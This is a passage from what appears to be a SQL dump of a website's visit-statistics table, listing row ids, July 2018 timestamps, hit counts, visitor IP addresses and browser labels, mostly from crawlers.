'51.15.146.39','chrome'),(276460,1532040798,1,1,0,0,'54.36.149.73','other'),(276461,1532040883,1,1,0,0,'54.36.148.131','other'),(276462,1532040889,1,1,0,0,'216.244.66.241','other'),(276463,1532040956,1,1,0,0,'54.36.148.42','other'),(276464,1532041124,1,1,0,0,'95.163.255.162','other'),(276465,1532041692,1,1,0,0,'8.29.198.27','other'),(276466,1532041722,1,1,0,0,'54.36.148.86','other'),(276467,1532041949,1,1,0,0,'95.163.255.197','other'),(276468,1532042115,1,1,0,0,'54.36.149.106','other'),(276469,1532042221,1,1,0,0,'54.36.148.238','other'),(276470,1532042541,1,1,0,0,'54.36.148.248','other'),(276471,1532042583,1,0,1,0,'66.249.75.157',''),(276472,1532042698,1,1,0,0,'178.154.171.88','other'),(276473,1532043234,1,1,0,0,'54.36.148.125','other'),(276474,1532043255,1,1,0,0,'216.244.66.241','other'),(276475,1532043444,1,1,0,0,'54.36.148.40','other'),(276476,1532043644,1,1,0,0,'54.36.148.129','other'),(276477,1532043905,1,1,0,0,'54.36.149.88','other'),(276478,1532044026,1,1,0,0,'54.36.148.112','other'),(276479,1532044860,1,1,0,0,'54.36.148.101','other'),(276480,1532045446,1,1,0,0,'54.36.148.136','other'),(276481,1532045950,2,2,0,0,'216.244.66.241','other'),(276482,1532046024,1,1,0,0,'54.36.148.106','other'),(276483,1532046082,1,1,0,0,'141.8.142.74','other'),(276484,1532046085,1,0,1,0,'66.249.75.153',''),(276485,1532046440,1,1,0,0,'54.36.148.55','other'),(276486,1532046444,1,1,0,0,'37.147.249.53','msie'),(276487,1532046897,1,1,0,0,'40.77.167.202','other'),(276488,1532047066,1,1,0,0,'54.36.149.22','other'),(276489,1532047189,1,1,0,0,'216.244.66.241','other'),(276490,1532047256,1,1,0,0,'54.36.148.29','other'),(276491,1532047287,1,1,0,0,'54.36.148.87','other'),(276492,1532047500,1,1,0,0,'54.36.148.196','other'),(276493,1532047567,1,1,0,0,'40.77.167.204','other'),(276494,1532047681,1,1,0,0,'54.36.149.52','other'),(276495,1532047773,1,1,0,0,'95.163.255.162','other'),(276496,1532047812,1,1,0,0,'54.36.148.99','other'),(276497,1532048161,1,1,0,0,'54.36.148.37','other'),(276498,1532048181,1,1,0,0,'178.154.171.88','other'),(276499,1532048372,2,2,0,0,'216.244.66.241','other'),(276500,1532048431,1,1,0,0,'40.77.167.203','other'),(276501,1532048556,1,1,0,0,'54.36.149.53','other'),(276502,1532048929,1,1,0,0,'8.29.198.25','other'),(276503,1532050301,1,1,0,0,'35.162.70.167','chrome'),(276504,1532050591,1,1,0,0,'54.36.148.146','other'),(276505,1532050702,1,1,0,0,'95.163.255.195','other'),(276506,1532050756,1,1,0,0,'54.36.148.151','other'),(276507,1532051188,4,4,0,0,'216.244.66.241','other'),(276508,1532051574,1,1,0,0,'40.77.167.202','other'),(276509,1532051959,1,1,0,0,'54.36.149.78','other'),(276510,1532052162,1,1,0,0,'216.244.66.241','other'),(276511,1532052207,1,1,0,0,'54.36.148.118','other'),(276512,1532052384,1,1,0,0,'54.36.149.6','other'),(276513,1532052527,1,1,0,0,'8.29.198.25','other'),(276514,1532052564,1,1,0,0,'40.77.167.205','other'),(276515,1532052570,1,1,0,0,'54.36.148.75','other'),(276516,1532052572,1,1,0,0,'54.36.149.69','other'),(276517,1532052581,1,1,0,0,'54.36.148.97','other'),(276518,1532053625,1,1,0,0,'178.154.171.88','other'),(276519,1532053682,1,1,0,0,'54.36.148.183','other'),(276520,1532054235,1,1,0,0,'54.36.149.6','other'),(276521,1532054393,1,1,0,0,'54.36.149.107','other'),(276522,1532054650,2,2,0,0,'216.244.66.241','other'),(276523,1532054726,1,1,0,0,'54.36.148.113','other'),(276524,1532055015,1,1,0,0,'180.76.15.163','other'),(276525,1532055456,1,0,1,0,'66.249.69.143',''),(276526,1532055715,1,1,0,0,'54.36.148.77','other'),(276527,1532056320,1,1,0,0,'216.244.66.241','other'),(276528,1532056473,1,1,0,0,'54.36.148.50','other'),(276529,1532056845,1,0,1,0,'66.249.75.155',''),(276530,1532057106,1,1,0,0,'37.9.113.114','other'),(276531,1532057110,1,1,0,0,'213.180.203.7','other'),(276532,1532057231,1,1,0,0,'54.36.148.159','other'),(276533,1532057358,1,1,0,0,'54.36.148.40','other'),(276534,1532058023,1,1,0,0,'54.36.149.98','other'),(276535,1532058066,1,1,0,0,'54.36.148.193','other'),(276536,1532058267,1,1,0,0,'54.36.149.100','other'),(276537,1532058553,1,1,0,0,'54.36.148.174','other'),(276538,1532058647,1,1,0,0,'54.36.148.61','other'),(276539,1532058707,1,1,0,0,'54.36.148.113','other'),(276540,1532058901,1,1,0,0,'54.36.148.86','other'),(276541,1532059180,1,1,0,0,'54.36.149.13','other'),(276542,1532059268,1,1,0,0,'54.36.148.47','other'),(276543,1532059769,1,1,0,0,'8.29.198.27','other'),(276544,1532059887,3,3,0,0,'216.244.66.241','other'),(276545,1532059888,1,1,0,0,'54.36.148.52','other'),(276546,1532060136,1,1,0,0,'178.154.171.88','other'),(276547,1532060673,1,1,0,0,'54.36.148.176','other'),(276548,1532060832,1,1,0,0,'141.8.142.74','other'),(276549,1532060833,1,1,0,0,'54.36.148.40','other'),(276550,1532061288,1,1,0,0,'54.36.148.246','other'),(276551,1532061299,25,25,0,0,'54.81.254.212','other'),(276552,1532062202,10,10,0,0,'54.81.254.212','other'),(276553,1532062242,4,4,0,0,'216.244.66.241','other'),(276554,1532062558,1,1,0,0,'54.36.149.65','other'),(276555,1532062566,1,1,0,0,'54.36.148.62','other'),(276556,1532062597,1,1,0,0,'54.36.148.22','other'),(276557,1532063151,1,1,0,0,'178.154.171.88','other'),(276558,1532063388,1,1,0,0,'8.29.198.27','other'),(276559,1532063559,1,1,0,0,'54.36.148.15','other'),(276560,1532063747,1,1,0,0,'54.36.149.22','other'),(276561,1532063934,1,1,0,0,'40.77.167.205','other'),(276562,1532063980,1,1,0,0,'54.36.149.41','other'),(276563,1532064401,1,1,0,0,'54.36.148.56','other'),(276564,1532064642,1,1,0,0,'54.36.148.234','other'),(276565,1532064703,1,1,0,0,'54.36.148.244','other'),(276566,1532064765,1,1,0,0,'54.36.149.98','other'),(276567,1532064782,1,1,0,0,'54.36.148.195','other'),(276568,1532064858,1,1,0,0,'54.36.148.128','other'),(276569,1532065100,1,1,0,0,'37.55.93.20','chrome'),(276570,1532065128,1,1,0,0,'216.244.66.241','other'),(276571,1532065458,1,1,0,0,'54.36.149.55','other'),(276572,1532065612,1,1,0,0,'54.36.149.36','other'),(276573,1532065716,1,1,0,0,'54.36.148.42','other'),(276574,1532065866,1,1,0,0,'91.196.178.90','firefox'),(276575,1532066588,1,0,1,0,'66.249.75.155',''),(276576,1532066732,1,0,1,0,'66.249.75.153',''),(276577,1532066845,1,1,0,0,'54.36.148.95','other'),(276578,1532066863,1,1,0,0,'54.36.149.17','other'),(276579,1532067111,1,1,0,0,'54.36.148.168','other'),(276580,1532067207,1,1,0,0,'91.124.54.143','firefox'),(276581,1532067373,1,1,0,0,'54.36.148.89','other'),(276582,1532067483,1,1,0,0,'54.36.148.97','other'),(276583,1532068243,1,1,0,0,'54.36.149.29','other'),(276584,1532068285,1,1,0,0,'188.230.43.254','other'),(276585,1532068869,1,1,0,0,'54.36.148.253','other'),(276586,1532068904,1,1,0,0,'54.36.149.99','other'),(276587,1532069233,1,1,0,0,'54.36.149.31','other'),(276588,1532069684,1,1,0,0,'77.111.247.50','chrome'),(276589,1532069745,2,2,0,0,'91.196.178.169','chrome'),(276590,1532069753,1,1,0,0,'216.244.66.241','other'),(276591,1532069813,1,1,0,0,'54.36.148.156','other'),(276592,1532069997,1,1,0,0,'95.135.41.248','opera'),(276593,1532070206,1,1,0,0,'54.36.148.93','other'),(276594,1532070445,1,1,0,0,'54.36.149.49','other'),(276595,1532070533,1,1,0,0,'54.36.148.128','other'),(276596,1532070622,1,1,0,0,'8.29.198.26','other'),(276597,1532070669,1,1,0,0,'188.230.43.254','other'),(276598,1532070718,1,1,0,0,'54.36.148.101','other'),(276599,1532070791,1,1,0,0,'216.244.66.241','other'),(276600,1532071091,1,1,0,0,'54.36.148.10','other'),(276601,1532071098,1,1,0,0,'180.76.15.140','other'),(276602,1532071644,1,1,0,0,'54.36.148.108','other'),(276603,1532071735,1,1,0,0,'54.36.149.55','other'),(276604,1532071801,1,1,0,0,'195.10.210.70','chrome'),(276605,1532071979,1,1,0,0,'54.36.149.32','other'),(276606,1532071994,1,1,0,0,'54.36.149.97','other'),(276607,1532072113,1,1,0,0,'54.36.148.174','other'),(276608,1532072146,1,1,0,0,'141.8.142.74','other'),(276609,1532072357,1,1,0,0,'178.63.26.114','other'),(276610,1532072631,2,2,0,0,'91.196.178.78','chrome'),(276611,1532072674,1,1,0,0,'216.244.66.241','other'),(276612,1532072701,1,1,0,0,'54.36.148.30','other'),(276613,1532073087,1,1,0,0,'188.230.43.254','other'),(276614,1532073329,1,1,0,0,'91.196.178.68','chrome'),(276615,1532073530,1,1,0,0,'54.36.148.193','other'),(276616,1532073767,1,1,0,0,'91.196.178.130','chrome'),(276617,1532074101,1,1,0,0,'54.36.149.85','other'),(276618,1532074172,2,2,0,0,'91.196.178.78','chrome'),(276619,1532074241,1,1,0,0,'8.29.198.27','other'),(276620,1532074551,1,1,0,0,'91.196.178.134','firefox'),(276621,1532074750,1,1,0,0,'54.36.148.194','other'),(276622,1532074942,1,1,0,0,'54.36.149.77','other'),(276623,1532075154,3,3,0,0,'216.244.66.241','other'),(276624,1532075285,1,1,0,0,'54.36.148.78','other'),(276625,1532075383,1,1,0,0,'54.36.148.205','other'),(276626,1532075413,1,1,0,0,'54.36.149.24','other'),(276627,1532075591,1,1,0,0,'54.36.148.141','other'),(276628,1532075723,1,1,0,0,'54.36.148.198','other'),(276629,1532076071,1,1,0,0,'54.36.149.73','other'),(276630,1532076400,1,1,0,0,'54.36.148.123','other'),(276631,1532076557,1,1,0,0,'54.36.149.102','other'),(276632,1532076881,3,3,0,0,'46.219.77.169','chrome'),(276633,1532077321,1,1,0,0,'54.36.148.91','other'),(276634,1532077330,1,1,0,0,'54.36.148.202','other'),(276635,1532077873,2,2,0,0,'141.8.142.74','other'),(276636,1532077896,3,3,0,0,'178.93.232.121','chrome'),(276637,1532078082,1,1,0,0,'178.95.66.69','chrome'),(276638,1532078323,2,2,0,0,'216.244.66.241','other'),(276639,1532078887,1,1,0,0,'54.36.148.89','other'),(276640,1532078979,1,1,0,0,'54.36.148.222','other'),(276641,1532079043,1,1,0,0,'54.36.149.60','other'),(276642,1532079083,1,1,0,0,'80.78.51.227','chrome'),(276643,1532079239,1,1,0,0,'95.163.255.153','other'),(276644,1532079601,1,1,0,0,'54.36.149.44','other'),(276645,1532079740,1,1,0,0,'54.36.149.98','other'),(276646,1532080099,1,1,0,0,'54.36.149.39','other'),(276647,1532080225,1,1,0,0,'54.36.148.227','other'),(276648,1532080331,2,2,0,0,'78.111.185.134','chrome'),(276649,1532080351,1,1,0,0,'54.36.149.21','other'),(276650,1532080524,1,1,0,0,'162.210.196.100','other'),(276651,1532080528,1,1,0,0,'54.36.148.47','other'),(276652,1532080611,1,1,0,0,'54.36.148.244','other'),(276653,1532080709,1,1,0,0,'91.124.182.170','firefox'),(276654,1532080773,1,1,0,0,'80.252.154.233','firefox'),(276655,1532080828,1,1,0,0,'40.77.167.203','other'),(276656,1532080847,2,2,0,0,'93.73.12.238','chrome'),(276657,1532081050,1,1,0,0,'54.36.148.144','other'),(276658,1532081404,1,1,0,0,'54.36.149.61','other'),(276659,1532081467,1,1,0,0,'8.29.198.26','other'),(276660,1532081652,1,1,0,0,'95.163.255.164','other'),(276661,1532081898,1,1,0,0,'54.36.148.174','other'),(276662,1532081907,1,1,0,0,'54.36.149.7','other'),(276663,1532082020,1,1,0,0,'54.36.148.60','other'),(276664,1532082551,1,1,0,0,'54.36.148.100','other'),(276665,1532082634,1,1,0,0,'54.36.148.32','other'),(276666,1532082767,2,2,0,0,'91.196.178.169','chrome'),(276667,1532082818,3,3,0,0,'195.201.117.150','other'),(276668,1532083171,1,1,0,0,'141.8.142.74','other'),(276669,1532083428,1,1,0,0,'54.36.148.14','other'),(276670,1532083556,1,1,0,0,'188.18.49.2','chrome'),(276671,1532083577,1,1,0,0,'54.36.148.46','other'),(276672,1532083788,1,1,0,0,'216.244.66.241','other'),(276673,1532084017,1,1,0,0,'54.36.148.26','other'),(276674,1532084231,1,1,0,0,'54.36.148.232','other'),(276675,1532084629,1,1,0,0,'194.1.195.225','firefox'),(276676,1532084745,1,1,0,0,'54.36.148.184','other'),(276677,1532084936,1,1,0,0,'54.36.148.95','other'),(276678,1532085081,1,1,0,0,'8.29.198.27','other'),(276679,1532085202,1,1,0,0,'54.36.148.169','other'),(276680,1532085353,1,1,0,0,'54.36.148.94','other'),(276681,1532085357,1,1,0,0,'54.36.148.22','other'),(276682,1532085442,1,1,0,0,'54.36.148.105','other'),(276683,1532085539,1,1,0,0,'54.36.148.247','other'),(276684,1532086160,1,1,0,0,'54.36.148.14','other'),(276685,1532086197,1,1,0,0,'31.43.99.12','other'),(276686,1532086571,1,1,0,0,'54.36.149.64','other'),(276687,1532086637,1,1,0,0,'95.133.20.174','chrome'),(276688,1532086738,1,1,0,0,'54.36.149.52','other'),(276689,1532087152,1,1,0,0,'54.36.149.60','other'),(276690,1532087202,1,1,0,0,'54.36.149.10','other'),(276691,1532087232,1,1,0,0,'141.8.142.74','other'),(276692,1532087374,1,1,0,0,'91.196.178.68','chrome'),(276693,1532087401,1,1,0,0,'95.163.255.163','other'),(276694,1532087432,1,1,0,0,'216.244.66.241','other'),(276695,1532087437,1,1,0,0,'54.36.149.42','other'),(276696,1532087464,1,1,0,0,'94.180.181.116','msie'),(276697,1532088001,2,2,0,0,'91.124.182.170','firefox'),(276698,1532088033,1,1,0,0,'91.196.178.175','chrome'),(276699,1532089083,1,1,0,0,'216.244.66.241','other'),(276700,1532089295,1,1,0,0,'54.36.149.57','other'),(276701,1532090565,2,2,0,0,'216.244.66.241','other'),(276702,1532090669,1,1,0,0,'178.154.171.88','other'),(276703,1532091086,1,1,0,0,'54.36.149.2','other'),(276704,1532091489,4,4,0,0,'91.235.224.8','firefox'),(276705,1532091861,1,1,0,0,'91.196.178.89','firefox'),(276706,1532091890,1,1,0,0,'216.244.66.241','other'),(276707,1532092312,1,1,0,0,'8.29.198.26','other'),(276708,1532092382,1,1,0,0,'95.163.255.155','other'),(276709,1532092483,1,1,0,0,'54.36.149.90','other'),(276710,1532092530,1,1,0,0,'54.36.148.81','other'),(276711,1532092551,1,1,0,0,'54.36.148.244','other'),(276712,1532092619,1,1,0,0,'198.211.121.79','chrome'),(276713,1532092678,1,1,0,0,'141.8.142.74','other'),(276714,1532092839,1,1,0,0,'95.163.255.168','other'),(276715,1532092949,1,1,0,0,'212.55.77.126','chrome'),(276716,1532093391,1,1,0,0,'54.36.148.13','other'),(276717,1532093695,1,1,0,0,'216.244.66.241','other'),(276718,1532094077,1,1,0,0,'40.77.167.203','other'),(276719,1532094538,1,1,0,0,'54.36.148.166','other'),(276720,1532094596,1,1,0,0,'178.154.171.88','other'),(276721,1532094874,1,1,0,0,'54.36.148.33','other'),(276722,1532095305,1,1,0,0,'54.36.148.178','other'),(276723,1532095532,1,1,0,0,'54.36.148.26','other'),(276724,1532095948,1,1,0,0,'8.29.198.25','other'),(276725,1532096040,1,1,0,0,'40.77.167.203','other'),(276726,1532096331,3,3,0,0,'141.8.142.74','other'),(276727,1532096429,1,1,0,0,'216.244.66.241','other'),(276728,1532096638,1,1,0,0,'54.36.148.141','other'),(276729,1532097080,1,1,0,0,'54.36.148.116','other'),(276730,1532097946,1,1,0,0,'54.36.148.55','other'),(276731,1532098004,1,1,0,0,'66.249.69.143','chrome'),(276732,1532098103,1,1,0,0,'216.244.66.241','other'),(276733,1532098178,1,1,0,0,'54.36.148.105','other'),(276734,1532098187,1,1,0,0,'54.36.148.154','other'),(276735,1532098267,1,1,0,0,'188.230.43.254','other'),(276737,1532098271,3,3,0,0,'92.113.189.235','chrome'),(276738,1532098527,1,1,0,0,'54.36.149.107','other'),(276739,1532098548,1,1,0,0,'178.154.171.88','other'),(276740,1532098790,1,1,0,0,'54.36.148.147','other'),(276741,1532098985,2,2,0,0,'91.196.178.174','chrome'),(276742,1532099294,2,2,0,0,'92.113.189.235','chrome'),(276743,1532099582,1,1,0,0,'54.36.149.19','other'),(276744,1532099887,3,3,0,0,'216.244.66.241','other'),(276745,1532100665,1,1,0,0,'188.230.43.254','other'),(276746,1532101017,1,1,0,0,'141.8.142.74','other'),(276747,1532101438,1,1,0,0,'54.36.148.68','other'),(276748,1532101851,1,1,0,0,'54.36.149.59','other'),(276749,1532101877,1,1,0,0,'54.36.148.243','other'),(276750,1532101984,1,1,0,0,'54.36.148.93','other'),(276751,1532102011,1,1,0,0,'180.76.15.163','other'),(276752,1532102257,1,1,0,0,'54.36.148.122','other'),(276753,1532102262,2,2,0,0,'216.244.66.241','other'),(276754,1532102486,1,1,0,0,'40.77.167.205','other'),(276755,1532102839,1,1,0,0,'54.36.148.132','other'),(276756,1532102903,1,1,0,0,'178.154.171.88','other'),(276757,1532102975,1,1,0,0,'54.36.148.99','other'),(276758,1532103055,1,1,0,0,'141.8.142.74','other'),(276759,1532103158,1,1,0,0,'8.29.198.25','other'),(276760,1532103621,1,1,0,0,'54.36.148.200','other'),(276761,1532103935,1,0,1,0,'66.249.75.155',''),(276762,1532104331,1,1,0,0,'54.36.149.72','other'),(276763,1532104400,1,1,0,0,'216.244.66.241','other'),(276764,1532104649,2,2,0,0,'91.196.178.49','chrome'),(276765,1532105484,3,3,0,0,'5.9.156.20','other'),(276766,1532105510,1,1,0,0,'54.36.149.0','other'),(276767,1532105556,1,1,0,0,'54.36.148.217','other'),(276768,1532105792,1,1,0,0,'212.87.173.192','chrome'),(276769,1532106169,1,1,0,0,'54.36.149.77','other'),(276770,1532106329,1,1,0,0,'141.8.142.74','other'),(276771,1532106369,1,1,0,0,'54.36.148.167','other'),(276772,1532106401,1,1,0,0,'178.154.171.88','other'),(276773,1532106466,1,1,0,0,'216.244.66.241','other'),(276774,1532106796,1,1,0,0,'8.29.198.27','other'),(276775,1532107759,1,1,0,0,'216.244.66.241','other'),(276776,1532108237,1,1,0,0,'54.36.148.249','other'),(276777,1532108949,1,1,0,0,'54.36.149.39','other'),(276778,1532109094,1,1,0,0,'54.36.148.95','other'),(276779,1532109121,1,1,0,0,'54.36.148.243','other'),(276780,1532109571,1,1,0,0,'54.36.148.153','other'),(276781,1532109657,1,1,0,0,'141.8.142.74','other'),(276782,1532110150,1,1,0,0,'54.36.148.32','other'),(276783,1532110355,1,1,0,0,'54.36.149.68','other'),(276784,1532110455,1,1,0,0,'185.94.214.47','firefox'),(276785,1532110465,2,2,0,0,'216.244.66.241','other'),(276786,1532110584,1,1,0,0,'54.36.149.22','other'),(276787,1532111060,1,1,0,0,'54.36.149.86','other'),(276788,1532111147,1,1,0,0,'54.36.149.98','other'),(276789,1532111578,3,3,0,0,'37.57.218.243','other'),(276790,1532111725,1,1,0,0,'141.8.142.74','other'),(276791,1532111978,3,3,0,0,'216.244.66.241','other'),(276792,1532111994,1,1,0,0,'54.36.148.34','other'),(276793,1532112186,1,1,0,0,'69.12.66.250','chrome'),(276794,1532112334,1,1,0,0,'69.12.66.200','chrome'),(276795,1532112641,1,1,0,0,'40.77.167.203','other'),(276796,1532112838,1,1,0,0,'54.36.148.212','other'),(276797,1532113165,1,1,0,0,'40.77.167.205','other'),(276798,1532113957,1,1,0,0,'54.36.149.103','other'),(276799,1532113999,1,1,0,0,'8.29.198.26','other'),(276800,1532114138,1,1,0,0,'54.36.149.66','other'),(276801,1532114460,1,1,0,0,'54.36.149.70','other'),(276802,1532114557,1,1,0,0,'54.36.148.229','other'),(276803,1532114596,1,1,0,0,'54.36.149.63','other'),(276804,1532114956,1,1,0,0,'54.36.148.20','other'),(276805,1532115226,3,3,0,0,'216.244.66.241','other'),(276806,1532115790,1,1,0,0,'54.36.148.156','other'),(276807,1532116082,1,1,0,0,'54.36.149.94','other'),(276808,1532116207,1,1,0,0,'54.36.148.165','other'),(276809,1532116461,1,1,0,0,'54.36.148.221','other'),(276810,1532116588,1,1,0,0,'54.36.148.196','other'),(276811,1532116748,1,1,0,0,'54.36.148.204','other'),(276812,1532117132,1,1,0,0,'54.36.148.75','other'),(276813,1532117536,1,1,0,0,'78.111.190.80','chrome'),(276814,1532117638,1,1,0,0,'8.29.198.27','other'),(276815,1532117780,2,2,0,0,'216.244.66.241','other'),(276816,1532118041,1,1,0,0,'66.249.69.145','chrome'),(276817,1532118259,1,1,0,0,'54.36.149.0','other'),(276818,1532118544,1,1,0,0,'54.36.149.20','other'),(276819,1532118600,1,1,0,0,'95.163.255.112','other'),(276820,1532118768,1,1,0,0,'144.76.120.197','other'),(276821,1532118801,1,1,0,0,'54.36.149.62','other'),(276822,1532119933,1,1,0,0,'54.36.148.226','other'),(276823,1532120188,2,2,0,0,'216.244.66.241','other'),(276824,1532120930,1,1,0,0,'13.66.205.121','other'),(276825,1532121082,1,1,0,0,'54.36.148.47','other'),(276826,1532121500,1,1,0,0,'54.36.148.122','other'),(276827,1532121628,1,1,0,0,'54.36.149.82','other'),(276828,1532121877,1,1,0,0,'54.36.148.231','other'),(276829,1532121966,1,1,0,0,'54.36.148.255','other'),(276830,1532122093,1,1,0,0,'54.36.148.206','other'),(276831,1532122107,1,1,0,0,'54.36.149.62','other'),(276832,1532122111,1,1,0,0,'54.36.148.86','other'),(276833,1532122382,1,1,0,0,'54.36.148.180','other'),(276834,1532122391,1,1,0,0,'54.36.148.50','other'),(276835,1532122514,3,3,0,0,'216.244.66.241','other'),(276836,1532123009,1,1,0,0,'54.36.148.137','other'),(276837,1532123325,1,1,0,0,'54.36.148.222','other'),(276838,1532123842,1,1,0,0,'54.36.148.214','other'),(276839,1532124256,1,1,0,0,'54.36.148.123','other'),(276840,1532124283,1,1,0,0,'141.8.142.74','other'),(276841,1532124738,1,1,0,0,'54.36.148.156','other'),(276842,1532124837,1,1,0,0,'8.29.198.25','other'),(276843,1532124979,1,1,0,0,'216.244.66.241','other'),(276844,1532125138,1,1,0,0,'54.36.148.172','other'),(276845,1532125183,1,1,0,0,'54.36.148.102','other'),(276846,1532125960,1,1,0,0,'54.36.149.105','other'),(276847,1532126278,1,1,0,0,'216.244.66.241','other'),(276848,1532126393,1,1,0,0,'40.77.167.205','other'),(276849,1532126579,1,1,0,0,'54.36.149.67','other'),(276850,1532126842,4,4,0,0,'144.76.38.10','other'),(276851,1532127018,1,1,0,0,'54.36.148.62','other'),(276852,1532127399,1,1,0,0,'54.36.148.198','other'),(276853,1532127996,1,1,0,0,'54.36.149.58','other'),(276854,1532128286,1,1,0,0,'54.36.148.40','other'),(276855,1532128485,1,1,0,0,'8.29.198.26','other'),(276856,1532128521,1,1,0,0,'54.36.149.84','other'),(276857,1532128900,1,1,0,0,'54.36.148.208','other'),(276858,1532129111,1,1,0,0,'54.36.148.158','other'),(276859,1532129231,1,1,0,0,'54.36.148.47','other'),(276860,1532129261,1,1,0,0,'54.36.149.22','other'),(276861,1532129560,1,1,0,0,'54.36.149.35','other'),(276862,1532129927,1,1,0,0,'54.36.148.185','other'),(276863,1532129974,1,1,0,0,'54.36.148.176','other'),(276864,1532130060,1,1,0,0,'54.36.149.14','other'),(276865,1532130166,1,1,0,0,'54.36.148.109','other'),(276866,1532130360,1,1,0,0,'54.36.149.83','other'),(276867,1532130431,1,1,0,0,'54.36.148.255','other'),(276868,1532130567,1,1,0,0,'216.244.66.241','other'),(276869,1532130964,1,1,0,0,'54.36.149.8','other'),(276870,1532131038,1,1,0,0,'46.229.168.81','other'),(276871,1532131671,1,1,0,0,'54.36.148.38','other'),(276872,1532131814,1,1,0,0,'54.36.148.169','other'),(276873,1532131930,1,1,0,0,'54.36.148.252','other'),(276874,1532132062,1,1,0,0,'54.36.149.6','other'),(276875,1532132657,1,1,0,0,'54.36.148.70','other'),(276876,1532132667,1,1,0,0,'95.163.255.180','other'),(276877,1532132785,2,0,2,0,'66.249.69.143',''),(276878,1532132835,1,1,0,0,'54.36.148.90','other'),(276879,1532132907,1,1,0,0,'54.36.148.52','other'),(276880,1532133392,2,2,0,0,'178.154.171.88','other'),(276881,1532133439,1,1,0,0,'54.36.149.36','other'),(276882,1532133699,1,1,0,0,'54.36.148.93','other'),(276883,1532133803,1,1,0,0,'54.36.149.15','other'),(276884,1532134083,1,1,0,0,'54.36.149.99','other'),(276885,1532134134,1,1,0,0,'141.8.142.74','other'),(276886,1532134179,1,1,0,0,'216.244.66.241','other'),(276887,1532134218,1,0,1,0,'66.249.69.143',''),(276888,1532135069,1,1,0,0,'54.36.149.59','other'),(276889,1532135289,1,1,0,0,'180.76.15.18','other'),(276890,1532135443,1,1,0,0,'54.36.148.37','other'),(276891,1532135675,1,1,0,0,'8.29.198.27','other'),(276892,1532135824,1,0,1,0,'66.249.75.155',''),(276893,1532135901,1,1,0,0,'54.36.148.53','other'),(276894,1532135991,2,2,0,0,'141.8.142.74','other'),(276895,1532136525,1,1,0,0,'95.163.255.112','other'),(276896,1532136535,2,2,0,0,'95.163.255.108','other'),(276897,1532136545,2,2,0,0,'95.163.255.107','other'),(276898,1532136558,1,1,0,0,'95.163.255.102','other'),(276899,1532136561,1,1,0,0,'54.36.148.67','other'),(276900,1532136571,1,1,0,0,'216.244.66.241','other'),(276901,1532136619,1,1,0,0,'95.163.255.119','other'),(276902,1532136982,1,1,0,0,'54.36.149.51','other'),(276903,1532137057,1,1,0,0,'52.41.211.72','chrome'),(276904,1532137615,1,1,0,0,'54.36.148.213','other'),(276905,1532137788,1,1,0,0,'54.36.148.104','other'),(276906,1532137980,1,1,0,0,'54.36.149.60','other'),(276907,1532138406,1,1,0,0,'54.36.148.124','other'),(276908,1532138735,3,3,0,0,'216.244.66.241','other'),(276909,1532139007,1,1,0,0,'54.36.148.24','other'),(276910,1532139038,1,1,0,0,'54.36.148.23','other'),(276911,1532139345,1,1,0,0,'8.29.198.27','other'),(276912,1532139413,1,1,0,0,'54.36.148.133','other'),(276913,1532139429,2,2,0,0,'141.8.142.74','other'),(276914,1532139496,1,1,0,0,'54.36.148.60','other'),(276915,1532139640,1,1,0,0,'54.36.149.51','other'),(276916,1532139665,1,1,0,0,'134.249.141.24','chrome'),(276917,1532139950,1,1,0,0,'87.250.224.46','other'),(276918,1532140048,1,1,0,0,'54.36.149.88','other'),(276919,1532140388,1,1,0,0,'54.36.148.154','other'),(276920,1532140725,1,1,0,0,'216.244.66.241','other'),(276921,1532140807,1,1,0,0,'54.36.148.111','other'),(276922,1532140972,1,1,0,0,'54.36.149.61','other'),(276923,1532141072,1,1,0,0,'54.36.148.56','other'),(276924,1532141244,1,1,0,0,'54.36.148.92','other'),(276925,1532141277,1,1,0,0,'54.36.148.95','other'),(276926,1532141283,1,1,0,0,'54.36.148.57','other'),(276927,1532141379,1,1,0,0,'54.36.149.6','other'),(276928,1532141732,1,1,0,0,'54.36.149.1','other'),(276929,1532141921,1,1,0,0,'54.36.148.15','other'),(276930,1532142306,1,1,0,0,'66.249.75.157','chrome'),(276931,1532142609,1,1,0,0,'13.66.205.121','other'),(276932,1532142821,1,1,0,0,'144.76.166.14','other'),(276933,1532143477,1,1,0,0,'178.154.171.88','other'),(276934,1532143478,1,1,0,0,'141.8.142.74','other'),(276935,1532143485,1,1,0,0,'54.36.148.85','other'),(276936,1532143558,1,1,0,0,'216.244.66.241','other'),(276937,1532144637,1,1,0,0,'54.36.148.102','other'),(276938,1532145099,1,1,0,0,'40.77.167.205','other'),(276939,1532145182,1,1,0,0,'54.36.148.109','other'),(276940,1532145383,1,0,1,0,'66.249.75.157',''),(276941,1532145787,1,1,0,0,'54.36.148.18','other'),(276942,1532145926,1,1,0,0,'40.77.167.204','other'),(276943,1532145944,1,1,0,0,'54.36.148.37','other'),(276944,1532146054,1,1,0,0,'54.36.148.35','other'),(276945,1532146520,1,1,0,0,'8.29.198.25','other'),(276946,1532146648,1,1,0,0,'54.36.148.157','other'),(276947,1532147255,1,1,0,0,'54.36.149.97','other'),(276948,1532147439,1,1,0,0,'54.36.148.49','other'),(276949,1532147509,1,1,0,0,'54.36.148.215','other'),(276950,1532147647,2,1,1,0,'66.249.75.153',''),(276951,1532147648,1,1,0,0,'51.255.65.46','other'),(276952,1532148339,2,2,0,0,'54.36.148.25','other'),(276953,1532149179,1,1,0,0,'54.36.148.189','other'),(276954,1532149256,1,1,0,0,'128.69.234.225','msie'),(276955,1532149492,2,2,0,0,'178.154.171.88','other'),(276956,1532149506,1,1,0,0,'54.36.149.9','other'),(276957,1532149512,1,1,0,0,'54.36.148.29','other'),(276958,1532149814,1,1,0,0,'54.36.148.61','other'),(276959,1532150063,2,2,0,0,'216.244.66.241','other'),(276960,1532150185,1,1,0,0,'8.29.198.25','other'),(276961,1532150371,1,1,0,0,'54.36.148.202','other'),(276962,1532150485,1,1,0,0,'162.210.196.97','other'),(276963,1532150662,1,1,0,0,'54.36.148.160','other'),(276964,1532150784,1,1,0,0,'54.36.148.56','other'),(276965,1532151015,1,1,0,0,'40.77.167.203','other'),(276966,1532151100,1,1,0,0,'54.36.149.43','other'),(276967,1532151309,1,0,1,0,'66.249.69.144',''),(276968,1532151408,1,1,0,0,'54.36.148.92','other'),(276969,1532151510,1,1,0,0,'178.154.171.88','other'),(276970,1532151532,1,1,0,0,'141.8.142.74','other'),(276971,1532151762,1,1,0,0,'54.36.149.82','other'),(276972,1532151870,1,1,0,0,'54.36.148.206','other'),(276973,1532152455,2,2,0,0,'216.244.66.241','other'),(276974,1532152522,1,1,0,0,'54.36.148.88','other'